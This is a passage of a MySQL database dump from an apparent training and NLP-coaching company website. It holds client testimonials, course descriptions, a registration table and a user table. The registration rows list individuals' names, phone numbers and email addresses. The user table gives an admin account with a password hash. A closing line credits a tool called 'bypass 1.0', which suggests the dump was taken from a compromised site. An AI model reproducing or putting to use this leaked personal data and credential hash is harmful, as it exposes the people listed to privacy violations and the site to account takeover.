margin-bottom: 0px; margin-left: 0px; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; outline-width: 0px; outline-style: initial; outline-color: initial; text-align: justify; color: rgb(79, 79, 79); ">Wish you all the best</p></span>                                                                ', 12),
(12, 'Mr. S.R.K. Raju', 'Sr. Manager Corporate Communications, Vizag Steel, Vishakapatnam', '<div>"It was really a fascinating experience to attend your two day programme at \r\nHyderabad. Ashok is a wonderful coach who knows how to put into the minds of \r\npeople what they want. Your approach was unique, you started the programme in \r\nsuch a style and how the two days went on was really thrilling. Your flow of \r\nknowledge in not only NLP but in other areas was tremendous. You have tons \r\nof energy in you.&nbsp;</div>\r\n<div>Even a lay man can understand what is NLP with your mode of teaching. You know how to induce the material into our brains. You know how to probe into our problems and solve them without even our noticing. I have attended several HRD lectures, but you are unique. Your conducting the practical exercises was really good that you area a good demonstrator.</div>\r\n<div>&nbsp;</div>\r\n<div>I really feel transformed in my approach. I was looking at things afresh and trying to see things differently, especially observing people in a new perspective. Earlier my approach was as per my maps, now I am trying to understand their language, their maps and I am able to compare with mine and act. My earlier approach was reaction with my maps, but not anymore. Hope to continue and gain much from the new maps given by you.</div><div>Thank You".</div>                                                                                                ', 7),
(14, 'Poonam Ahluwalia', 'Psychologist, Hyderabad', '<p>Two days of NLP were like an eyeopener, an experience, which transcended me to a realm of perpetual sunshine where all the haze was dispelled. It was like being pulled out from a slimy swamp and dipped in a clear, clean water. The sheer change of view and angle of looking at things can bring so much clarity in vision and thoughts is amazing. All thanks to Ashok and Jessica who introduced us to this vehicle of thought. Many cobwebs which were hindering clear vision and thoughts were removed.\r\n</p>\r\n<p>\r\nThe concepts of ''outcome state'', ''filters'', ''clean language'', ''setting realistic goals'' and commitment to them are all so familiar but seldom imbibed at a conscious level by us. Your subtle way of delivering the whole concept, bringing everyone at a comfort zone, where emotional flow and sharing becomes so easy was all very mesmerizing. By end of the second day sessions I felt I knew all those people inside out.\r\n</p>\r\n<p>\r\nI think that is the Power named NLP!</p>\r\n<p>Thanks to you all for all this enriching experience, I look forward to more interaction on the subject and experiential exchange with you and your team. My sincere regards and best wishes to team UNOVA on their journey of transforming lives!\r\n</p>', 6),
(16, 'Srikanth Goud', 'Corporate Trainer, IBM', '<div>My learning from the NLP workshop has been as follows:</div><div>There are many explanations of NLP, each is like a beam of light shining from a different angle, picking out the whole shape and shadow of the subject. NLP studies how we structure our subjective experience - how we think about our values and beliefs and how we create our emotional states and &nbsp;construct our internal world from our experience and give it meaning. No event has meaning in itself, we give it meaning, and different people may give the same event different meanings.&nbsp;</div><div>So, NLP studies experience from the inside. NLP is more than just a collection of techniques. It is also a way of thinking, a frame of mind based on curiosity, exploration and fun. <b>''NLP is whatever works''</b></div><div>NLP brings about self-development and change. First you use it to work on yourself to become the person you really want to be and can be. &nbsp;NLP is not about fixing other people and neglecting yourself. “Put your own mask on first. ''I’ factor” An &nbsp;outcome is not the same as a task. An outcome is what you want, A task is what you have to do to achieve it. Don''t do tasks until you set your outcomes, Problems cannot be solved unless you have an outcome.</div><div>Change is a journey from an unsatisfactory present state towards a desired state – &nbsp;your outcome.</div><div>Problem Thinking: Problems are difficult because the very act of thinking about them makes us feel bad and therefore less resourceful. We do not think as clearly so it is harder to think of a solution.Problem thinking makes the problem even harder to solve “Let Go “ Factor &nbsp;is the best factor which I have learnt in the session and majority of my stress related &nbsp;challenges were addressed , and the training delivery in "Story &nbsp;telling Model" by Ashok was inimitable&nbsp;</div><div>Thank you Ashok and Jessica .</div>', 3),
(17, 'Lineesh Hatwar', 'Entrepreneur, Nagpur', '<div><b>The Diploma program I attended at Hyderabad was a life changing experience</b> . I learned about my thinking patterns and some of my shortcomings. The group sharing its rich and diverse experiences and thinking patterns enriched my own learning experience and perspectives. &nbsp;Through a practical approach, I &nbsp;could see how each individual thinks and most important how one could get to know about others thinking process &nbsp;and how to rise above your own circumstances and achieve your best from life.&nbsp;</div><div><br></div><div>Secondly the book given is wonderful and had given exposure to a &nbsp;new approach looking at life, the concept of yognidra taken up was wonderful.&nbsp;</div><div><br></div><div>As per arrangements were concerned, they were all taken care very well by Jessica. My best compliments to her and all the best for all her works.</div><div><br></div>', 4),
(18, 'Mohammed Ajmal', 'Lead Trainer, Savoy Global, Qatar', '<div>I was always interested to know the real NLP as I had a bad introduction to it and that was one of the motivation factors to attend the training. I must count myself lucky that I also had the chance to talk to Ashok Sir more than the participants - courtesy my accommodation. As we had discussed during the event, my health was a factor I wanted to improve and Ashok Sir made me realize that I was the reason for my own health and made me realize that I had been avoiding the signs from my body. Guess my mind was given utmost importance and the body received almost none.<br></div><div><br></div><div>Though Ashok Sir scared the life out of me by saying that I might end up losing my voice, thanks to Jessi who made me realize that it was meant to make me take notice of the potential danger that could arise in the future. Post the training, I have done just 2 days of training as I decided to take a break and spend some time with my family. I''ve been praying 5 times a day everyday and after every prayer I practise the yoga technique taught to me by my gym instructor to strengthen my back. I also do deep breathing where I try not to think of nothing but absolute silence. It makes me feel much better and refreshed. On a lighter vein, It has also made me sleep well at times.</div><div><br></div><div>I really admire the approach Ashok Sir used in the session where he took the example of the participants and thereby explained concepts. Now I''m able to recollect the concepts as I remember Poonam(for an example) participating in the associate / dissociate concept and others too. I also appreciate the way Ashok Sir handled the problem makers on day 1 and turned them into learners on day 2.</div><div><br></div><div>I think I''d fail my feedback duty if I dont mention two books - the one given by Ashok Sir on NLP Secrets and the other gifted to me by Jessi - From where you are to where you want to be. The NLP secrets book is one of the simplest ways to explain NLP and I''m in love with it. I''m sure I''ll be reading it quite a lot of times in the near future. Its a treasure. And the other book - Jessi, I really dont know how to say thank you, its sort of a wonderful feeling reading it, especially when I actually do the exercises in it. Thanks a tonne to the both of you again. In the near future, I''d love to learn advanced stages of NLP from Ashok Sir. Regarding the venue, quality of the materials etc, no complaints what so ever.</div><div><br></div><div><br></div>', 5),
(19, 'Priya Gururaj', 'HR Professional, Honkong', '                                 <div>The NLP Diploma Program has been an <b>enriching experience for me</b> on both personal&nbsp;and professional fronts.</div><div><br></div><div>On the professional front, the program provided me with a platform to work further&nbsp;on the NLP path. It helped me to relate a lot of theoretical concepts to practical&nbsp;experiences which were a key highlight. I would like to mention here, that Ashok’s&nbsp;unique style of&nbsp;experiential&nbsp;delivery of concepts added a lot of value. Ashok helped&nbsp;bring in a comfort level with the structure of the program, which further enhanced the&nbsp;learning process. Experiencing the concept of Outcome thinking and associated /&nbsp;disassociated states through real life examples brought in a clear understanding.With my previous background in Human Resources, I was able to relate to instances&nbsp;wherein NLP techniques of Modeling would have helped me perform better.</div><div><br></div><div>On the personal front, I found outcome thinking to be a real eye-opener to help deal&nbsp;with issues which were affecting me. Though it needs repeated practice, it provided me&nbsp;with an avenue to work on. Providing a sense of direction to deal with personal issues is&nbsp;what I was looking for and this program has certainly given me the same.</div><div><br></div><div>Analysis of Language patterns and its effect on the thinking filters is a concept which I&nbsp;found very interesting to work on.The style of the program wherein each of us got to personally experience the&nbsp;techniques gave us an opportunity to realize the value and potential.</div><div><br></div><div>Overall, the entire program provided me with a much needed detailed introduction to the&nbsp;concept of NLP which I was seeking. I hope to move ahead now with my NLP learning&nbsp;process.</div>                                ', 2);

-- --------------------------------------------------------

--
-- Table structure for table `training`
--

CREATE TABLE IF NOT EXISTS `training` (
  `training_id` int(11) NOT NULL AUTO_INCREMENT,
  `training_title` varchar(100) NOT NULL,
  `training_content` longtext NOT NULL,
  `order` int(11) NOT NULL,
  PRIMARY KEY (`training_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=15 ;

--
-- Dumping data for table `training`
--

INSERT INTO `training` (`training_id`, `training_title`, `training_content`, `order`) VALUES
(1, 'Leadership Training', '<p><i>"The single biggest way to impact the organization is to focus on leadership development. There is no limit to the potential of the organization that recruits good people, raises them up as leaders, and continually develops them."</i>- John Maxwell.</p>\r\n<p>Leadership begins with self leadership. It is about impact and influence in your personal and professional lives. The right leadership training equips individuals and organizations for exponential growth and impact.</p>\r\n<p>We provide customized Leadership Training programs of highest international standards.</p>\r\n<span class="trainingcontact">For your Leadership Training</span>\r\n', 1),
(2, 'Transformational Leadership', '<p>Transformational leadership causes change in individuals and social systems. It creates valuable and positive change in the followers with the end goal of developing followers into leaders. We are familiar with the old adage – <i>"A herd of sheep led by a lion performs far better than a pride of lions led by a sheep"</i>. But we can take you beyond that. What if you can transform your company into a "pride of lions led by a lion"? Imagine the power of that! It can change the shape of your business entirely.</p>\r\n<span class="trainingcontact">To Transform your company through Transformational Leadership</span>', 2),
(3, 'MBTI', '<p>The <b>Myers-Briggs Type Indicator (MBTI)</b> assessment is a psychometric questionnaire developed originally by Katharine Cook Briggs and her daughter Isabel Briggs Myers. It is designed to measure psychological preferences in how people perceive the world and make decisions. Our MBTI specialist can assist you in with psychometric test and evaluations in the areas of leadership training, executive coaching, life coaching, personal development, decision making, team building, group dynamics, marketing, career counseling and marriage counseling.</p>\r\n<span class="trainingcontact">For MBTI Training needs</span>', 4),
(4, 'Six Hats', '<p>The <b>de Bono Hats</b> system also known as "Six Hats" or "Six Thinking Hats" is attributed to Dr. Edward de Bono and is the subject of his book, Six Thinking Hats. It is a thinking tool for group discussion and individual thinking. Combined with the idea of parallel thinking, it enables groups to think together more effectively, and to plan thinking processes in a detailed and cohesive way. This powerful tool aids organizations and individuals function more effectively, energizing, synergizing and optimizing resources for maximum impact and effectiveness.</p>\r\n<span class="trainingcontact">For Six Hats Training needs</span>\r\n', 5),
(5, 'Change management', '<p><i>"The quicker you let go of old cheese, the sooner you find new cheese."</i> –Spencer Johnson in ''Who Moved My Cheese''</p>\r\n<p>Change is not pleasant but it is the only constant. Only when we change and grow, will only we see a world we never know. We help individuals, teams and organizations to shift/transition from a current state to a desired future state by empowering employees to accept and embrace changes in their current business environment. \r\n</p>\r\n<span class="trainingcontact">For your Change Management needs</span>', 6),
(6, 'Emotional intelligence', '<p>Successful living is not all about high IQ. Emotional Intelligence plays a major role in determining one’s success. Emotional Intelligence or social Intelligence is the ability to act wisely in human relationships. It helps in connecting with people, understanding what makes people tick and getting them to do what you want. It helps in areas of self awareness, managing emotions, motivating oneself, recognizing emotions in others and handling relationships. It acts as a sensitivity tool that allows effective managers to pick up tacit messages, connect and influence. It enriches your life.</p>\r\n<span class="trainingcontact">For your Emotional Intelligence Training needs</span>', 7),
(7, 'Personal Transformation', '<p><i>"We do not need magic to transform our world. We carry all of the power we need inside ourselves already. "</i>- JK Rowling. </p>\r\n<p>If you are ready to shed your perceived limitations and rise to your full potential, we are ready to help you. Through our unique transformational training, we take you through the stages of personal transformation, reprogramming your belief systems and letting your brilliance shine through.</p>\r\n<span class="trainingcontact">For the unique UNOVA experience..</span> ', 8),
(8, 'Communication Skills', '<p><i>"Effective Communication is about listening through the ears of the listener"</i></p>\r\n<p>If you want to succeed, you must learn how to connect with people. And while it may seem like some people are just born with it, the fact is anyone can learn how to make every communication an opportunity for a powerful connection. Learn how to identify with people and relate to others in a way that increases your influence with them. To be a successful leader, you need to learn to communicate in a way that connects with others.</p>\r\n<span class="trainingcontact">For your Connecting through Effective Communication</span>', 9),
(9, 'Conflict Management', '<p><i>"Whenever you''re in conflict with someone, there is one factor that can make the difference between damaging your relationship and deepening it. That factor is attitude."</i> - William James</p>\r\n<p>In any group, there is bound to be conflict. Conflict management is not concerned with eliminating all conflict or avoiding conflict. It is about limiting the negative aspects of conflict and increasing the positive aspects. It enhances learning, effectiveness and performance in an organizational setting. It is also about capitalizing on the rich resources of diverse thinking.  We can help you manage conflicts smartly to increase group outcomes and overall effectiveness of your team.</p>\r\n<span class="trainingcontact">To capitalize on Conflict Management</span>', 10),
(10, 'Stress Management', '<p><i>"A Diamond is a piece of charcoal that handles stress exceptionally well"</i></p>\r\n<p>Stress is a state of mind. It could pull you down or help you stretch. It is all about your perception of a situation. Through our unique NLP based stress management techniques, we help you handle challenging situations positively so that you remain happy and successful in life.  We follow a holistic approach to help you take charge of your stress rather than stress taking over you. </p>\r\n<span class="trainingcontact">For Managing Stress in your personal and professional Life</span>', 11),
(11, 'Time Management', '<p><i>"Things which matter most must never be at the mercy of things that matter least". - Johann Wolfgang von Goethe</i></p>\r\n<p>Time Management is more about managing ourselves, than managing time. And this starts with self awareness and prioritization.  People who choose to improve their time management skills improve their quality of life. The fact that you’re here suggests you’re actually prepared to do something about it. And our goal is to help you get what you want- working around your priorities and getting the results you want in life. </p>\r\n<span class="trainingcontact">To manage your time and your life contact</span>', 12),
(12, 'Outbound Training', '<p>Outbound Training & Experiential Learning is an effective program to increase employee productivity as well as enhance employee engagement. It enables participants to learn and experience challenges in an unfamiliar natural setting, away from an everyday office routine. It enhances behavioral skills and qualities of an individual, bringing out latent facets of personality. Interactive sessions, creative activities, leadership & team building exercises, and adventure based activities help in building self confidence, team spirit, and trust in each other. Participants relate better to their work situations and to each other. Various leadership styles are learnt through experiential methods, and the benefits of team victories as compared to personal glory are emphasized. </p>\r\n<span class="trainingcontact">For your Outbound Training Requirements</span>', 13),
(13, 'Neuro Linguistic Programming', '<p>This workshop is an exciting possibility of a beautiful transformation of your thinking skills and hence your life. We will explore the various models of NLP to see how we can learn and benefit from them. NLP can bring about changes into your lives and helps you in achieving your true potential. We commit ourselves wholeheartedly and sincerely to assist  you in this beautiful journey to achieve the outcomes that you need for yourself. To ensure high quality training, we would be working with a small group of 10-15 participants in this programme. We invite you to come and explore your true potential with us.</p>\r\n\r\n<p><u>Outcomes </u>:</p>\r\n<ul>\r\n<li>To become aware of the effect that you have on others as an individual - both physically & verbally!</li>\r\n<li>To explore what is success for you and how successful are you in your life, by studying some successful simple personalities around.\r\n</li>\r\n<li>To understand your patterns of excellence & your patterns of mediocrity or weakness & build on your resources to achieve your outcomes.</li>\r\n<li>To learn how to connect with what you might miss with your intelligence & to negotiate your learning/living with all the different worlds of wisdom available around you.</li>\r\n<li>To learn some modern ways of influencing/coaching people to bring out the best in them.</li>\r\n<li>To connect with the higher purpose of your life and how you can be connected that way in every moment of your life!</li>\r\n</ul>\r\n<p><u>Training Format </u>:</p>\r\n<p>The training is usually conducted in a coaching format, where real time issues of the participants are used as examples to see how NLP formats can help oneself. Expect a lot of laughter, fun & stories during the training. The training is modeled on some of the world pioneers in NLP & Personal Change. The topics covered on each day will depend on what evolves in the group and what the trainer thinks is the most relevant topic to challenge the participants for their development. Usually  a mix  of topics flow in each session, while the focus will be on mastering one format. Much of the planning is usually done in real time.</p>\r\n<span class="trainingcontact">For transforming yourself through NLP Training</span>\r\n\r\n', 3),
(14, 'Rapport Building', '<p><i>"Building rapport begins with you. The entire process of building rapport is built on the foundation of concern, caring, compassion, interest, and a desire for the well-being of your customer." </i>--Kevin Hogan, speaker and author</p>\r\n<p>Rapport building is a powerful catalyst in connecting with people. It is an important prerequisite in any meaningful communication or business relationship. It is about touching a heart before asking for a hand.  All enduring business relationships must start with the human connection first. Good rapport is an equally important key element in team building, group cohesiveness, etc. to bring energy and synergy to the workplace.  Through our experiential learning workshops we equip you with this valuable key towards unlocking human hearts and doors to successful business relationships.</p>\r\n<span class="trainingcontact">To experience our unique rapport building workshops</span>', 14);

-- --------------------------------------------------------

--
-- Table structure for table `training_registration`
--

CREATE TABLE IF NOT EXISTS `training_registration` (
  `training_reg_id` int(10) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) NOT NULL,
  `organization` varchar(200) NOT NULL,
  `contact_no` varchar(50) NOT NULL,
  `email` varchar(100) NOT NULL,
  `location` varchar(100) NOT NULL,
  `website` varchar(100) NOT NULL,
  `type` varchar(50) NOT NULL,
  `reference` varchar(200) NOT NULL,
  `datetime` datetime NOT NULL,
  `training_id` int(11) NOT NULL,
  PRIMARY KEY (`training_reg_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=9 ;

--
-- Dumping data for table `training_registration`
--

INSERT INTO `training_registration` (`training_reg_id`, `name`, `organization`, `contact_no`, `email`, `location`, `website`, `type`, `reference`, `datetime`, `training_id`) VALUES
(1, 'shansalam', 'isrishti', '342543535', 'shan.salam@isrishti.com', '', 'isrishti.com', 'Organization', 'news', '2011-08-29 15:14:05', 1),
(2, 'SajanMoideen', '', '+917702711120', 'jessisajan@gmail.com', '', '', 'Organization', 'web', '2011-09-01 04:17:30', 1),
(3, 'JayarajNaidu', 'Defence', '919500136550', 'jrnaidu2001@yahoo.com', '', '', 'Individual', 'word of mouth', '2011-09-03 11:33:36', 1),
(4, 'MarnaniPraneeth', '', '09000055336', 'praneeth@airtel.blackberry.com', '', '', 'Organization', 'Internet', '2011-09-20 06:56:42', 1),
(6, 'http://akjxvytzsata.com/http://akjxvytzsata.com/', 'xpMxdVagGXuZwqhl', '', '', 'New York', 'http://akjxvytzsata.com/', 'Organization', '1195', '2011-11-23 19:33:18', 10),
(7, 'SrikanthNimmala', '', '919553704997', 'srikanth_nimmala@yahoo.com', 'Hyderabad', '', 'Individual', 'Previous Workshops ', '2011-12-29 23:46:11', 3),
(8, 'SajanM', '', '04024343366', 'sajansummers@gmail.com', 'Hyd', 'Test', 'Organization', 'Test 1', '2012-03-19 03:23:50', 6);

-- --------------------------------------------------------

--
-- Table structure for table `user`
--

CREATE TABLE IF NOT EXISTS `user` (
  `user_id` int(5) NOT NULL AUTO_INCREMENT,
  `username` varchar(70) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`user_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=20 ;

--
-- Dumping data for table `user`
--

INSERT INTO `user` (`user_id`, `username`, `password`) VALUES
(1, 'admin', '9ac644e4e169a34980983957211e4fdb');

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net